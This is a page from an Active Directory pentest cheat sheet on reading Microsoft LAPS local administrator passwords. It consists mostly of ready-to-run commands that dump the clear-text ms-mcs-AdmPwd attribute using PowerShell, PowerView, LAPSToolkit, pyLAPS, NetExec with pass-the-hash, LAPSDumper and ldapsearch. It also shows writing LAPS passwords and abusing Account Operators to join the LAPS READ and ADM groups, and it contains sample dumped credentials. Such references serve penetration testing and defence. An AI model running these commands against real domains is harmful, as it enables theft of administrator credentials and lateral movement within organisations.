pwd-read-laps.md (4412B)
1 --- 2 title: "Password - LAPS" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/pwd-read-laps.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-read-laps.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Password - LAPS 12 13 ## Reading LAPS Password 14 15 > Use LAPS to automatically manage local administrator passwords on domain joined computers so that passwords are unique on each managed computer, randomly generated, and securely stored in Active Directory infrastructure. 16 17 ### Determine if LAPS is installed 18 19 ```ps1 20 Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll' 21 Get-FileHash 'c:\program files\LAPS\CSE\Admpwd.dll' 22 Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' 23 ``` 24 25 ### Extract LAPS password 26 27 > The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users 28 29 - Windows/Linux: 30 31 ```ps1 32 bloodyAD -u john.doe -d bloody.lab -p Password512 --host 192.168.10.2 get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime 33 ``` 34 35 - From Windows: 36 37 - adsisearcher (native binary on Windows 8+) 38 39 ```powershell 40 ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { $_.properties} 41 ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=MACHINE$))").findAll() | ForEach-Object { $_.properties} 42 ``` 43 44 - [PowerTools/PowerView](https://github.com/PowerShellEmpire/PowerTools) 45 46 ```powershell 47 PS > Import-Module .\PowerView.ps1 48 PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime 49 ``` 50 51 - [leoloobeek/LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) 52 53 ```powershell 54 $ Get-LAPSComputers 55 ComputerName Password Expiration 56 ------------ -------- ---------- 57 example.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18 58 59 $ Find-LAPSDelegatedGroups 60 $ Find-AdmPwdExtendedRights 61 ``` 62 63 - Powershell AdmPwd.PS 64 65 ```powershell 66 foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}} 67 ``` 68 69 - From Linux: 70 71 - [p0dalirius/pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords: 72 73 ```bash 74 # Read the password of all computers 75 ./pyLAPS.py --action get -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1 76 # Write a random password to a specific computer 77 ./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1 78 ``` 79 80 - [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec): 81 82 ```bash 83 netexec ldap 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps 84 ``` 85 86 - [n00py/LAPSDumper](https://github.com/n00py/LAPSDumper) 87 88 ```bash 89 python laps.py -u 'user' -p 'password' -d 'domain.local' 90 python laps.py -u 'user' -p 'e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c' -d 'domain.local' -l 'dc01.domain.local' 91 ``` 92 93 - ldapsearch 94 95 ```bash 96 ldapsearch -x -h -D "<bind user>" -w -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd 97 ``` 98 99 ### Grant LAPS Access 100 101 The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password 102 103 ```ps1 104 Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local" 105 Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local" 106 ``` 107 108 ## References 109 110 - [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)